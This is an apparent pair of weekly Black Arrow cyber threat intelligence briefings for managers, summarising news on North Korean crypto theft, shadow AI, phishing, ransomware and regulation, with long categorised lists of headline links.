Hackers linked to North Korea have reportedly stolen $1.34bn in cryptocurrency so far this year, accounting for over half of all such thefts. This surge highlights a reliance on illicit digital funds to finance ballistic missile and nuclear programmes, with the US estimating a third of North Korea’s missile development is funded by hacking. Attacks slowed after a reported strategic partnership with Russia in June which may have reduced North Korea’s dependency on cyber crime, although overall crypto-based hacking has risen. Despite total stolen amounts being lower than in previous years, the number of breaches is at a record 303, indicating an ongoing need for robust cyber security measures.

Beware Of Shadow AI: Shadow IT’s Less Well-Known Brother

Research indicates that 50–75% of employees use non-company AI tools, raising concerns around data leakage, compliance, and vulnerabilities to cyber attack. The number of these applications continues to surge, yet only 15% of organisations have a formal AI policy in place. This lack of oversight can lead to reputational and legal damage. While AI promises innovation and productivity gains, leaders must address Shadow AI by establishing robust governance, enforcing granular controls, and conducting frequent security audits. Boards should ensure their cyber security strategy helps mitigate these risks while unlocking AI’s benefits.

Working with Security Consultants Will Bolster Cyber Resilience as We Enter 2025

With a shortage of talent, new regulations on the horizon, and an evolving threat landscape, cyber resilience is becoming a top priority for organisations. The upcoming UK Cyber Security and Resilience Bill and stringent frameworks for financial institutions highlight the urgent need for robust defences. Despite this focus on cyber security, many organisations face recruitment hurdles due to an undersupplied talent pool. As a result, hiring external cyber security specialists is emerging as a cost-effective solution, giving businesses access to the necessary skills without the lengthy recruitment process. This approach helps close the talent gap while strengthening defences into 2025 and beyond.

Sources:

https://www.techradar.com/pro/Hackers-are-using-Russian-domains-to-launch-complex-document-based-phishing-attacks

https://www.darkreading.com/vulnerabilities-threats/how-nation-state-cybercriminals-target-enterprise

https://informationsecuritybuzz.com/phishing-report-findings-fundamental/

https://www.forbes.com/sites/rogertrapp/2024/12/22/organizations-need-to-get-real-about-threat-of-cyber-attacks/

https://www.techradar.com/pro/security/dark-web-cybercriminals-are-buying-up-id-to-bypass-kyc-methods

https://www.securityweek.com/cl0p-ransomware-group-to-name-over-60-victims-of-cleo-attack/

https://www.helpnetsecurity.com/2024/12/26/service-disruptions-concern/

https://www.infosecurity-magazine.com/news/infostealers-lumma-stealer/

https://www.infosecurity-magazine.com/news/ransomware-industries-downtime/

https://www.silicon.co.uk/security/cyberwar/north-korea-hacking-593725

https://www.securityweek.com/beware-of-shadow-ai-shadow-its-less-well-known-brother/

https://www.scotsman.com/business/working-with-security-consultants-will-bolster-cyber-resilience-as-we-enter-2025-4907662

Governance, Risk and Compliance

Organisations Need To Get Real About Threat Of Cyber Attacks

Working with security consultants will bolster cyber resilience as we enter 2025

Small Business Cyber Security Statistics

Half of UK businesses hit by cyber breaches in 2024 - Digital Journal

The holiday crunch: Threats security teams face and how to mitigate them | ITPro

Managing Threats When Most of the Security Team Is Out of the Office

How Nation-State Cyber Criminals Are Targeting the Enterprise

Cyber security response: Not just an IT issue but an emergency preparedness priority - Nextgov/FCW

Why the industry can’t afford complacency in 2025 | SC Media

New Study Reveals Widening Gap Between Cyber Attack Causes and Public Perception

Top Cyber Security Compliance Issues Businesses Face Today - Security Boulevard

Navigating the Cyber Threat Landscape: Lessons Learned & What’s Ahead

Cyber Risks and Insurance 2025 Forecast | Wiley Rein LLP - JDSupra

Cyber security spending trends and their impact on businesses - Help Net Security

Cyber security: The changing threat and risk landscape | A&O Shearman - JDSupra

Businesses Need New AI Governance in Cyber Security and Privacy

How to Streamline Your Cyber Security Risk Management Process

Threats

Ransomware, Extortion and Destructive Attacks

Ransomware Attackers Target Industries with Low Downtime Tolerance - Infosecurity Magazine

Small Business Cyber Security Statistics

Half of UK businesses hit by cyber breaches in 2024 - Digital Journal

Clop ransomware is now extorting 66 Cleo data-theft victims

LockBit Admins Tease a New Ransomware Version - Infosecurity Magazine

LockBit Developer Rostislav Panev Charged for Billions in Global Ransomware Damages

New Warning As Self-Deleting Cyber Attack Targets Windows, Mac

Top 10 Cyber Law Enforcement Operations of 2024 - Infosecurity Magazine

Beware Feb. 3, 2025—Diabolic Ransomware Gang Issues New Attack Warning

Interlock ransomware attacks highlight need for greater security standards on critical infrastructure | TechRadar

Suspected LockBit dev faces extradition to the US • The Register

How companies can fight ransomware impersonations - Help Net Security

Nearly four decades on and, like Jesus, ransomware won't die • The Register

6 Crafty Tactics Cyber Criminals Use To Snag Money From Home Users Fast

Facing the Specter of Cyber Threats During the Holidays

Brazilian Hacker Charged for Extorting $3.2M in Bitcoin After Breaching 300,000 Accounts

Ransomware Victims

Clop ransomware is now extorting 66 Cleo data-theft victims

5.6M people exposed in Ascension Health ransomware incident earlier this year | Cybernews

Hackney Council: Cyber Attack Cost 'hundreds of thousands' - BBC News

Krispy Kreme breach, data theft claimed by Play ransomware gang

Ransomware Group Claims Theft of Personal, Financial Data From Krispy Kreme - SecurityWeek

Phishing & Email Based Attacks

Phishing Report Findings Call For A Fundamental Shift In Organisational Approaches To Defence

This devious two-step phishing campaign uses Microsoft tools to bypass email security | TechRadar

Hackers are using Russian domains to launch complex document-based phishing attacks | TechRadar

Fake DocuSign docs used to secure corporate credentials in mishing campaign | SC Media

Rockstar2FA Collapse Fuels Expansion of FlowerStorm Phishing-as-a-Service

A new Microsoft 365 phishing service has emerged, so be on your guard | TechRadar

Urgent New Gmail Security Warning For Billions As Attacks Continue

Defence Giant General Dynamics Says Employees Targeted in Phishing Attack - SecurityWeek

Other Social Engineering

You Need to Create a Secret Password With Your Family | WIRED

Lazarus APT targeted employees at an unnamed nuclear-related organisation

North Korean “Laptop Farm” IT Worker Scam Targets Multiple High-Profile Companies | Ankura - JDSupra

Artificial Intelligence

AI-driven scams are about to get a lot more convincing - Help Net Security

AI Could Generate 10,000 Malware Variants, Evading Detection in 88% of Case

Beware Of Shadow AI – Shadow IT's Less Well-Known Brother - SecurityWeek

AI impersonators will wreak havoc in 2025. Here’s what to look for | PCWorld

Italy’s Data Protection Watchdog Issues €15m Fine to OpenAI Over ChatG - Infosecurity Magazine

You Need to Create a Secret Password With Your Family | WIRED

Urgent New Gmail Security Warning For Billions As Attacks Continue

Businesses Need New AI Governance in Cyber Security and Privacy

Will AI Drive Efficiency and Budget Growth? Risks, Rewards & Reality - Security Boulevard

Open source machine learning systems are highly vulnerable to security threats | TechRadar

The Intersection of AI and OSINT: Advanced Threats On The Horizon - SecurityWeek

2FA/MFA

Evilginx: Open-source man-in-the-middle attack framework - Help Net Security

Home for the holidays? Share this top cyber security advice with friends and family | TechCrunch

Malware

Infostealers Dominate as Lumma Stealer Detections Soar by Almost 400% - Infosecurity Magazine

AI Could Generate 10,000 Malware Variants, Evading Detection in 88% of Case

New Warning As Self-Deleting Cyber Attack Targets Windows, Mac

Cryptomining Malware Found in Popular Open Source Packages - Infosecurity Magazine

Researchers Uncover PyPI Packages Stealing Keystrokes and Hijacking Social Accounts

New 'OtterCookie' malware used to backdoor devs in fake job offers

Iran's Charming Kitten Deploys BellaCPP: A New C++ Variant of BellaCiao Malware

Bots/Botnets

Webcams and DVRs Vulnerable to HiatusRAT, FBI Warns - Infosecurity Magazine

BadBox rapidly grows, 190,000 Android devices infected - Security Affairs

New Androxgh0st botnet targets vulnerabilities in IoT devices and web applications via Mozi integration | TechRadar

How Not To Become A Botnet Victim: A Practical Guide For Everyone

New botnet exploits vulnerabilities in NVRs, TP-Link routers

How Androxgh0st, the hybrid botnet, rose from Mozi's ashes • The Register

Botnets leverage decade-old D-Link vulnerabilities in new attack campaigns - SiliconANGLE

A new Mirai botnet variant targets DigiEver DS-2105 Pro DVRs

Mobile

Apple warns spyware targets via ‘threat notifications,’ offers these next steps - 9to5Mac

CISA: Use Signal or other secure communications app - Help Net Security

Fake DocuSign docs used to secure corporate credentials in mishing campaign | SC Media

ICO Warns of Festive Mobile Phone Privacy Snafu - Infosecurity Magazine

iOS devices more exposed to phishing than Android - Help Net Security

FBI Says Use Secret Word, NSA Says Reboot iPhone—Should You Listen?

Spyware Maker NSO Group Found Liable In US Court | Silicon UK

Denial of Service/DoS/DDoS

DNSSEC Denial-of-Service Attacks Show Technology's Fragility

Top 10 Cyber Law Enforcement Operations of 2024 - Infosecurity Magazine

DDoS Attacks Surge as Africa Expands Its Digital Footprint

Palo Alto Releases Patch for PAN-OS DoS Flaw — Update Immediately

7 Ways to Stop VoIP DDoS Attacks from Crashing Your Phones

Internet of Things – IoT

Webcams and DVRs Vulnerable to HiatusRAT, FBI Warns - Infosecurity Magazine

BadBox rapidly grows, 190,000 Android devices infected - Security Affairs

New Androxgh0st botnet targets vulnerabilities in IoT devices and web applications via Mozi integration | TechRadar

New botnet exploits vulnerabilities in NVRs, TP-Link routers

How Androxgh0st, the hyrbird botnet, rose from Mozi's ashes • The Register

A new Mirai botnet variant targets DigiEver DS-2105 Pro DVRs

6 Easy Ways To Make Your Smart Home More Secure

Data Breaches/Leaks

Infostealers Dominate as Lumma Stealer Detections Soar by Almost 400% - Infosecurity Magazine

Small Business Cyber Security Statistics

Half of UK businesses hit by cyber breaches in 2024 - Digital Journal

Clop ransomware threatens 66 Cleo attack victims with data leak

These were the badly handled data breaches of 2024 | TechCrunch

5.6M people exposed in Ascension Health ransomware incident earlier this year | Cybernews

Ascension: Health data of 5.6 million stolen in ransomware attack

FTC orders Marriott and Starwood to implement strict data security

Peugeot Data Breach: Hackers Threaten to Release Stolen Client Information

Nearly half a million people had data stolen after cyber attack on American Addiction Centers | The Record from Recorded Future News

What Should You Do When You Receive a Data Breach Notice? - CNET

Organised Crime & Criminal Actors

Major Biometric Data Farming Operation Uncovered - Infosecurity Magazine

New Study Reveals Widening Gap Between Cyber Attack Causes and Public Perception

Message service predominantly used by Pixel users intercepted by authorities - PhoneArena

Suspected LockBit dev faces extradition to the US • The Register

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

792 Syndicate Suspects Arrested in Massive Crypto and Romance Scam: The Rise of Cyber Crime as a Corporate Enterprise - IT Security Guru

North Korea hackers behind 60% of all crypto stolen in 2024

North Koreans Stole $1.34bn In Crypto This Year | Silicon UK Tech

NFT scammers charged for stealing $22 million through "rug pulls" - Help Net Security

US and Japan Blame North Korea for $308m Crypto Heist - Infosecurity Magazine

Cryptomining Malware Found in Popular Open Source Packages - Infosecurity Magazine

South Korea sanctions 15 North Koreans for crypto heists and cyber theft

Crypto scam suspect arrested in bed as cyber crime cops raid home - Manchester Evening News

Brazilian Hacker Charged for Extorting $3.2M in Bitcoin After Breaching 300,000 Accounts

Insurance

Cyber Risks and Insurance 2025 Forecast | Wiley Rein LLP - JDSupra

Cloud/SaaS

Rockstar2FA Collapse Fuels Expansion of FlowerStorm Phishing-as-a-Service

A new Microsoft 365 phishing service has emerged, so be on your guard | TechRadar

Amazon Security Warning As 3 High-Rated Vulnerabilities Hit Cloud

Why Cloud Identity Attacks Outpace On-Premises Risks

Outages

Service disruptions continue to blindside businesses - Help Net Security

Identity and Access Management

Non-Human Identities Gain Momentum, Requires Both Management, Security

Why Cloud Identity Attacks Outpace On-Premises Risks

Encryption

Why cryptography is important and how it’s continually evolving - Security Boulevard

Linux and Open Source

What open source means for cyber security - Help Net Security

Cryptomining Malware Found in Popular Open Source Packages - Infosecurity Magazine

Strengthening open source: A roadmap to enhanced cyber security - Nextgov/FCW

The Linux log files you should know and how to use them | ZDNET

Open source machine learning systems are highly vulnerable to security threats | TechRadar

Passwords, Credential Stuffing & Brute Force Attacks

Home for the holidays? Share this top cyber security advice with friends and family | TechCrunch

Social Media

Drug Dealers Have Moved on to Social Media | WIRED

Researchers Uncover PyPI Packages Stealing Keystrokes and Hijacking Social Accounts

Regulations, Fines and Legislation

Meet the In-Laws: the UK’s Digital Legislative Agenda for 2025 | Ropes & Gray LLP - JDSupra

EU DORA: Are you in scope, and if so, how can you prepare? | King & Spalding - JDSupra

The Cyber Resilience Act: A Field Guide for CTOs and CISOs | HackerNoon

A Hit-and-Miss First Year for SEC’s Cyber Incident Reporting Rules | MSSP Alert

Trump 2.0 Portends Big Shift in Cyber Security Policies

Guardians Of Peace: The EU’s Role In Global Security – OpEd – Eurasia Review

Europe's move toward cyber security sovereignty [Q&A]

INTERPOL welcomes adoption of UN convention against cyber crime

FTC orders Marriott and Starwood to implement strict data security

Italy’s Data Protection Watchdog Issues €15m Fine to OpenAI Over ChatGPT - Infosecurity Magazine

Cyber experts applaud White House cyber security plan

FCC ‘rip and replace’ provision for Chinese tech tops cyber provisions in defence bill | The Record from Recorded Future News

Models, Frameworks and Standards

EU DORA: Are you in scope, and if so, how can you prepare? | King & Spalding - JDSupra

The Cyber Resilience Act: A Field Guide for CTOs and CISOs | HackerNoon

Data Protection

5 Questions to Ask to Ensure Data Resiliency

Law Enforcement Action and Take Downs

792 Syndicate Suspects Arrested in Massive Crypto and Romance Scam: The Rise of Cyber Crime as a Corporate Enterprise - IT Security Guru

BadBox rapidly grows, 190,000 Android devices infected - Security Affairs

LockBit Developer Rostislav Panev Charged for Billions in Global Ransomware Damages

NFT scammers charged for stealing $22 million through "rug pulls" - Help Net Security

LockBit Taunts New Version as Original Developer Charged | SC Media UK

Interpol Identifies Over 140 Human Traffickers in New Initiative - Infosecurity Magazine

Top 10 Cyber Law Enforcement Operations of 2024 - Infosecurity Magazine

Massive live sports piracy ring with 812 million yearly visits taken offline

Message service predominantly used by Pixel users intercepted by authorities - PhoneArena

Crypto scam suspect arrested in bed as cyber crime cops raid home - Manchester Evening News

Brazilian Hacker Charged for Extorting $3.2M in Bitcoin After Breaching 300,000 Accounts

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

The 2024 cyberwar playbook: Tricks used by nation-state actors | CSO Online

Middle East Cyberwar Rages On, With No End in Sight

Nation State Actors

How Nation-State Cyber Criminals Are Targeting the Enterprise

China

CISA: Use Signal or other secure communications app - Help Net Security

Underwater footage raises suspicions of undersea cable sabotage as European authorities board Chinese ship for investigation | Tom's Hardware

DHS Says China, Russia, Iran, and Israel Are Spying on People in US with SS7

Hundreds of organisations were notified of potential Salt Typhoon compromise - Nextgov/FCW

Major cyber security attack from China exposes systematic flaws - TheStreet

Feds lay blame while Chinese telecom attack continues | CyberScoop

FCC ‘rip and replace’ provision for Chinese tech tops cyber provisions in defence bill | The Record from Recorded Future News

Russia

Russia fires its biggest cyber weapon against Ukraine | CSO Online

Ukraine blames Russia for mega cyber attack on ‘critically important’ infrastructure – POLITICO

Hackers are using Russian domains to launch complex document-based phishing attacks | TechRadar

Underwater footage raises suspicions of undersea cable sabotage as European authorities board Chinese ship for investigation | Tom's Hardware

Russians deleted one of Ukraine's most restricted registers in recent cyber attack, Ukrainian official says | Ukrainska Pravda

International Cyber Defence Coalition Reports Significant Progress in Protecting Ukrainian Digital Infrastructure | HaystackID - JDSupra

DHS Says China, Russia, Iran, and Israel Are Spying on People in US with SS7

Russian cyber attack: Breach occurred at 'top-level account,' MP says

Iran

DHS Says China, Russia, Iran, and Israel Are Spying on People in US with SS7

OilRig Hackers Exploiting Windows Kernel 0-day to Attack Organisations

Iran's Charming Kitten Deploys BellaCPP: A New C++ Variant of BellaCiao Malware

North Korea

North Korea hackers behind 60% of all crypto stolen in 2024

North Koreans Stole $1.34bn In Crypto This Year | Silicon UK Tech

US and Japan Blame North Korea for $308m Crypto Heist - Infosecurity Magazine

Lazarus APT targeted employees at an unnamed nuclear-related organisation

North Korean “Laptop Farm” IT Worker Scam Targets Multiple High-Profile Companies | Ankura - JDSupra

New 'OtterCookie' malware used to backdoor devs in fake job offers

South Korea sanctions 15 North Koreans for crypto heists and cyber theft

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

Middle East Cyberwar Rages On, With No End in Sight

Europe is the top target for hacktivists, Orange Cyberdefence report reveals  | Total Telecom

Apple warns spyware targets via ‘threat notifications,’ offers these next steps - 9to5Mac

Pegasus spyware maker NSO Group is liable for attacks on 1,400 WhatsApp users - The Verge

'Expulsion to Spain': Israeli Hackers Flock to Barcelona in Big Spyware Shift - National Security & Cyber - Haaretz.com

Tools and Controls

ICO Warns of Festive Mobile Phone Privacy Snafu - Infosecurity Magazine

DNSSEC Denial-of-Service Attacks Show Technology's Fragility

What is security service edge (SSE)? | ITPro

Modern IAM: What it looks like, how to achieve it | SC Media

API security blind spots put businesses at risk - Help Net Security

The Linux log files you should know and how to use them | ZDNET

The Pen Test Trap: Why Most Businesses Get It Wrong | MSSP Alert

Cyber security response: Not just an IT issue but an emergency preparedness priority - Nextgov/FCW

Do Honeypots Still Matter? | HackerNoon

Cyber security spending trends and their impact on businesses - Help Net Security

Maximizing the impact of cyber crime intelligence on business resilience - Help Net Security

The Intersection of AI and OSINT: Advanced Threats On The Horizon - SecurityWeek

How Generative AI Is Powering A New Era Of Cyber Security

Too Much 'Trust,' Not Enough 'Verify'

5 Common DNS Vulnerabilities and How to Protect Your Network - Security Boulevard

New 'OtterCookie' malware used to backdoor devs in fake job offers

How to Streamline Your Cyber Security Risk Management Process

The Role of Enterprise Browsers in Securing Remote Work and Hybrid Teams - IT Security Guru

Law enforcement agencies see AI as a key tool for reducing crime - Help Net Security

Other News

The holiday crunch: Threats security teams face and how to mitigate them | ITPro

Managing Threats When Most of the Security Team Is Out of the Office

Japan Airlines Was Hit by a Cyber Attack, Delaying Flights During the Year-End Holiday Season - SecurityWeek

New Study Reveals Widening Gap Between Cyber Attack Causes and Public Perception

Deck the Halls with Cyber Walls: Navigating National Security in the Digital Age | Ropes & Gray LLP - JDSupra

The Worst Hacks of 2024 | WIRED

Healthcare in the Cross Hairs: Cyber Criminals Have Found Another High-Value Target - Security Boulevard

Decoding the end of the decade: What CISOs should watch out for | Computer Weekly

Cyber Security Resolutions: Skill Sets to Prioritize in 2025

From a 'lightbulb' moment to a 'sense of urgency': 5 cyber and network stories from 2024  - Breaking Defence

The complexities of cyber security in local government | UKAuthority

The Geopolitics of Water: Cyber Attacks' Impact on Water Stress in the U.S. and Beyond

Scottish rail network 'wholly unequipped' for digital world amid 'Nightsleeper' cyber attack fears

Estate agents warned against festive cyber attacks - Property Industry Eye

Vulnerability Management

Emerging Threats, Vulns to Prepare for in 2025

Impact of Unpatched Vulnerabilities in 2025 - Security Boulevard

Top 7 zero-day exploitation trends of 2024 | CSO Online

Vulnerabilities

Sophos Issues Hotfixes for Critical Firewall Flaws: Update to Prevent Exploitation

How to Protect Your Environment from the NTLM Vulnerability

BeyondTrust says hackers hit its remote support products | TechRadar

Critical SQL Injection Vulnerability in Apache Traffic Control Rated 9.9 CVSS — Patch Now

Apache warns of critical flaws in MINA, HugeGraph, Traffic Control

Microsoft warns of Windows 11 24H2 installation issue that blocks all future security updates

Palo Alto Releases Patch for PAN-OS DoS Flaw — Update Immediately

Fortinet flags some worrying security bugs coming back from the dead | TechRadar

Amazon Security Warning As 3 High-Rated Vulnerabilities Hit Cloud

Adobe warns of critical ColdFusion bug with PoC exploit code

Critical Vulnerabilities Found in WordPress Plugins WPLMS and VibeBP - Infosecurity Magazine

OilRig Hackers Exploiting Windows Kernel 0-day to Attack Organisations

Open source machine learning systems are highly vulnerable to security threats | TechRadar

Microsoft fixes bug behind random Office 365 deactivation errors

Botnets leverage decade-old D-Link vulnerabilities in new attack campaigns - SiliconANGLE

TrueNAS device vulnerabilities exposed during hacking competition | TechRadar

Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

·       Automotive

·       Construction

·       Critical National Infrastructure (CNI)

·       Defence & Space

·       Education & Academia

·       Energy & Utilities

·       Estate Agencies

·       Financial Services

·       FinTech

·       Food & Agriculture

·       Gaming & Gambling

·       Government & Public Sector (including Law Enforcement)

·       Health/Medical/Pharma

·       Hotels & Hospitality

·       Insurance

·       Legal

·       Manufacturing

·       Maritime & Shipping

·       Oil, Gas & Mining

·       OT, ICS, IIoT, SCADA & Cyber-Physical Systems

·       Retail & eCommerce

·       Small and Medium Sized Businesses (SMBs)

·       Startups

·       Telecoms

·       Third Sector & Charities

·       Transport & Aviation

·       Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Top Cyber Stories of the Last Week

Mobile Spear Phishing Targets Executive Teams

Over the past few months, sophisticated spear phishing campaigns have intensified, targeting corporate executives via mobile devices and trusted business platforms. These attacks leverage advanced redirection techniques, PDF-based phishing links and compromised domains to bypass traditional defences. Mobile devices represent a distinct and often unsecured attack surface, enabling threat actors to harvest high-value corporate credentials with alarming efficiency. To protect against these evolving threats, organisations require education and awareness as well as advanced, on-device detection and prevention measures. Recent research has shown that zero-day protection and adaptive, mobile-specific security solutions are now critical to safeguarding sensitive enterprise data.

From Digital Risk to Physical Threat: Why Cyber Security Must Evolve for Executives

Protecting executives goes beyond digital measures, as these leaders’ personal safety and actions directly affect company valuation, investor confidence, and regulatory scrutiny. The US Securities and Exchange Commission (SEC)’s emphasis on governance and risk transparency underscores the importance of securing executives against both cyber and physical threats. Proactive approaches - blending digital and physical security, continuous monitoring of key terms, and behavioural science insights - are vital. By identifying threats early, understanding their social context, and ensuring senior leaders appreciate these vulnerabilities, organisations can strengthen resilience, reassure stakeholders, and meet regulatory expectations in evolving threat landscape.

Why HNWIs are Seeking Personal Cyber Security Consultants

High net worth individuals (HNWIs) are facing increasingly complex and evolving cyber threats, from phishing and ransomware to social engineering. Their wealth, influence and public profile make them prime targets, exposing them to severe financial, reputational and personal risks. HNWIs need to ensure they have conducted tailored risk assessments, and ensure appropriate security controls, constant monitoring, and privacy management for individuals and families. With global cyber crime costs projected to reach $10.5 trillion annually by 2025, these actions help safeguard digital assets, protect reputations, and ensure peace of mind in an ever more volatile online environment.

Ransomware in 2024: New Players, Bigger Payouts, and Smarter Tactics

Ransomware remains the leading global cyber security threat in 2024, with new groups rising after criminal takedowns. Demands soared, including a record-breaking $75 million ransom. Attacks span multiple sectors, with the construction industry hit hardest, and often occur overnight or at weekends. Over three-quarters paid ransoms, with average demands exceeding $1.5 million, and recovery costs surpassing $2.7 million. Smaller enterprises are especially vulnerable.

Credential Phishing Attacks Up Over 700 Percent

Phishing remains a top concern for organisations worldwide, with a new report showing credential-based attacks increasing by 703% in late 2024. Overall email threats rose by 202%, exposing employees to up to six threats per week and as many as 600 mobile threats annually. 80% of malicious links were previously unknown, underscoring limitations in static defences. Social engineering-based attacks surged by 141%, forcing leaders to reconsider their approach. Experts anticipate continued escalation in 2025, stressing the need for comprehensive and proactive security strategies backed by real-time detection and adaptable mitigation measures to outpace increasingly agile attackers.

All Major European Financial Firms Suffer Supplier Breaches

New research found that all major European financial firms experienced supplier-related breaches last year. Only a quarter achieved top-tier cyber security resilience ratings, while nearly all suffered from third- and fourth-party breaches. Around a fifth also endured a direct breach. Some 33% of financial services companies received a lower rating, with pending EU regulations like DORA adding urgency. Scandinavian firms outperformed peers, whereas French organisations reported the highest rate of supply chain breaches. Improving domain name system (DNS) configurations, endpoint security and patching cycles were recommended to strengthen defences.

Phishers Cast Wide Net with Spoofed Google Calendar Invites

A recent phishing campaign has spoofed Google Calendar invites, reaching about 300 organisations with more than 4,000 malicious emails over four weeks. Fraudsters trick users into clicking bogus links that eventually lead to fake sites designed to steal personal and financial details. Such attacks are lucrative: last year, victims in one country lost nearly $19 million to phishing scams. Security experts advise verifying links before clicking, and using two-factor authentication. As criminals easily adapt their methods, staying vigilant and questioning unusual requests remain vital for safeguarding against these persistent social engineering threats.

Security Leaders Say Machine Identities Are Next Big Target for Cyber Attack

New research shows many organisations faced cloud related security incidents last year, causing delays for over half, service outages for almost half, and data breaches for nearly a third. Security leaders warn that machine identities, especially access tokens and service accounts, are the next major target. They also predict more sophisticated supply chain attacks involving AI. Conflicts persist between security and development teams, and complexity grows as machine identities proliferate. Experts say securing these identities, along with automated protection and comprehensive controls, is now essential to safeguard cloud environments and ensure stable, secure business operations.

Ransomware Defences are Weakened by Backup Technology

Recent research by Object First shows ransomware attacks increasingly target backup data and exploit vulnerabilities. Research participants said their outdated systems (34%), limited encryption (31%) and failed backups (28%) weaken defences. Immutable storage is seen as vital, with 93% agreeing it is essential and 97% planning to invest. Zero Trust principles are widely supported, but managing these technologies poses challenges. Nearly 41% lack the necessary skills and 69% cannot afford extra expertise. The findings underscore the urgency for resilient, ransomware-proof backup systems and highlight the need for robust cyber security measures to mitigate these evolving threats.

Cyber Security is Never Out-of-Office: Protecting Your Business Anytime, Anywhere

With many staff away during the festive season, cyber criminals see an ideal opportunity to strike. Ransomware attacks surge by around 30% on public holidays and weekends, with 89% of security professionals worried about off-hours threats. As payment rates have fallen from around 80% to 36% over five years, attackers now exploit vulnerable times such as night shifts to make their attacks more effective. Organisations must ensure year-round vigilance, including strong authentication, continuous patching, and clear incident response plans. Proper training, supply chain security, data encryption and processes to verify money transfers are essential. In short, robust cyber security plans cannot afford an “out of office.”

Ransomware, Deepfakes, and Scams: The Digital Landscape in 2024

ESET’s 2024 threat report highlights a surge in investment and crypto scams, often using deepfakes and celebrity images to enhance credibility. New ransomware operators have emerged to fill the void left by ransomware gangs such as Lockbit, with RansomHub alone claiming nearly 500 victims, including major companies. Infostealer activity has shifted as infostealers RedLine and Meta were taken down, boosting their competitor Lumma’s popularity by 368%. Malware trends are mixed, with the detection of Agent Tesla malware down by 26% but Formbook malware showing a dramatic spike of up to 7,000 daily detections. Despite some law enforcement successes, the cyber security landscape remains unpredictable and continuously evolving.

UK Companies Face Increasing Cyber Security Risks Across a Range of Threats

New findings from Horizon3.ai’s "Cyber Security Report UK 2024/2025" show a growing risk environment across various industries, with nearly half of UK organisations (48%) citing stolen user credentials as a top cyber security threat. Insufficiently secured or unknown data stores were noted by 42%, and almost a third (29%) flagged attacks exploiting known but unpatched software vulnerabilities. In the survey of 150 executives and IT professionals, 69% reported at least one cyber attack in the past two years, yet 66% lack adequate defences. Experts advise continuous penetration testing and more proactive, attacker-focused security measures to strengthen resilience, given the escalation in attack complexity and severity.

Sources:

https://securityboulevard.com/2024/12/mobile-spear-phishing-targets-executive-teams/

https://www.scworld.com/perspective/from-digital-risk-to-physical-threat-why-cybersecurity-must-evolve-for-executives

https://securityboulevard.com/2024/12/why-hnwis-are-seeking-personal-cybersecurity-consultants/

https://www.helpnetsecurity.com/2024/12/19/ransomware-surveys-2024/

https://betanews.com/2024/12/18/credential-phishing-attacks-up-over-700-percent/

https://www.infosecurity-magazine.com/news/all-europes-top-financial-firms/

https://www.theregister.com/2024/12/18/google_calendar_spoofed_in_phishing_campaign/

https://www.businesswire.com/news/home/20241216555147/en/Security-Leaders-Say-Machine-Identities-%E2%80%93-Such-as-Access-Tokens-and-Service-Accounts-%E2%80%93-Are-Next-Big-Target-for-Cyberattack

https://www.techradar.com/pro/Ransomware-defenses-are-being-weakened-by-outdated-backup-technology-limited-backup-data-encryption-and-failed-data-backups

https://www.welivesecurity.com/en/business-security/cybersecurity-never-out-of-office-protecting-business-anytime-anywhere/

https://www.techradar.com/pro/security/ransomware-deepfakes-and-scams-the-digital-landscape-in-2024

https://pressat.co.uk/releases/uk-companies-face-increasing-cyber-security-risks-across-a-range-of-threats-new-report-reveals-eb07fa15c46681cbda6c239a57c3f447/

Governance, Risk and Compliance

Why HNWIs are Seeking Personal Cyber Security Consultants - Security Boulevard

UK Companies Face Increasing Cyber Security Risks Across a Range of Threats, New Report Reveals | Pressat

From digital risk to physical threat: Why cyber security must evolve for executives | SC Media

Innovation, insight and influence: the CISO playbook for 2025 and beyond | Computer Weekly

77% of IT leaders cite cyber security as top challenge in global survey

ISC2 Survey Reveals Critical Gaps in Cyber Security Leadership Skills - Infosecurity Magazine

How to turn around a toxic cyber security culture | CSO Online

The evolution of incident response: building a successful strategy | TechRadar

The Importance of Empowering CFOs Against Cyber Threats

How the cyber security landscape affects the financial sector

Threat of personal liability has CISOs sweating | ITPro

70% of cyber security leaders influenced by personal liability concerns | Security Magazine

CISO accountability: Navigating a landscape of responsibility - Help Net Security

How weaponized AI drives CISO burnout – and what to do about it | SC Media

CISO Challenges for 2025: Overcoming Cyber Security Complexities - Security Boulevard

MSSP Market Update: Fortune 500 Firms Fail at Cyber Security | MSSP Alert

2025 is set to bring changes in technology adoption and the evolving attack surface

Cyber security In 2025 – A New Era Of Complexity

To Defeat Cyber Criminals, Understand How They Think

The evolution of incident response: building a successful strategy | TechRadar

Making smart cyber security spending decisions in 2025

Threats

Ransomware, Extortion and Destructive Attacks

Ransomware threat shows no sign of slowing down | Microscope

Ransomware defences are being weakened by outdated backup technology, limited backup data encryption, and failed data backups | TechRadar

Clop is back to wreak havoc via vulnerable file-transfer software | CyberScoop

The year in ransomware: Security lessons to help you stay one step ahead - Security Boulevard

Ransomware in 2024: New players, bigger payouts, and smarter tactics - Help Net Security

‘Tis the Season to Be Alert for Cyber Threats: 5 Unjoyful… | Intel 471

Cyber security is never out-of-office: Protecting your business anytime, anywhere

46% of financial institutions had a data breach in the past 24 months - Help Net Security

Akira and RansomHub Surge as Ransomware Claims Reach All-Time High - Infosecurity Magazine

Clop ransomware claims responsibility for Cleo data theft attacks

Ransomware, deepfakes, and scams: the digital landscape in 2024 | TechRadar

RansomHub emerges as dominant ransomware group as 2024 ends | SC Media

LockBit ransomware gang teases February 2025 return | Computer Weekly

How Cyber Attacks Hold Patient Care Hostage | MedPage Today

Ransomware Gang Says Deloitte Sucks at Their Job - Going Concern

How Do We Build Ransomware Resilience Beyond Just Backups?

Romanian Netwalker ransomware affiliate sentenced to 20 years in prison

